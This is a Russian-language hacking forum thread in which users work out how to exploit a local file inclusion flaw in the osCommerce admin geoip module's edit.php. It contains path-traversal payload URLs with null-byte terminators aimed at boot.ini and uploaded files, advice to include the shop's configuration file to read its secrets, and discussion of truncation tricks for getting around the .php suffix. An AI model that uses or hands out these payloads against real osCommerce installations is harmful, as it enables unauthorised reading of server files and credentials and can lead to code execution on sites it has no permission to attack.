Нашел LFI, но незнаю как реализовать... http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../../../../../boot.ini%00 Все бы хорошо, но помимо include() эта переменная используется еще где-то: Code: Fatal error: Call to a member function loadIniFile() on a non-object in C:\web\htdocs\oscommerce\admin\includes\applications\modules_geoip\pages\edit.php on line 18 Code: 18: $osC_Language->loadIniFile('modules/geoip/' . $_GET['module'] . '.php'); Помогите
http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../../../../../../../../C:/web/htdocs/oscommerce/includes/conf не помню название конфига.php%00 Проинклудь конфиг, поиграйся.
Pirotexnik Шляпу экстрасенса, увы, потерял, поэтому требую код ф-ции loadIniFile =\ И строку с инклюдом данной переменной тоже неплохо бы увидеть. pharm_all Что-что, простите? Каким образом он проинклюдит (и как это поможет!?) если у него не работает инклюд?
Что я делаю не так? Посмотрел кодес. Интересно, причем тут это вообще? Инклюд идет в первой строчке скрипта. Причем тут вообще то, что вызывается далее?
Да, затупил я... Теперь вопрос по поводу .php http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi - GOOD http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.php%00 - BAD http://localhost/oscommerce/admin/includes/applications/modules_geoip/pages/edit.php?module=../../../../../../lfi.gif%00 - BAD ./[4096] - тоже не спасли. Это у меня на локалхосте косяк?) Как быть?
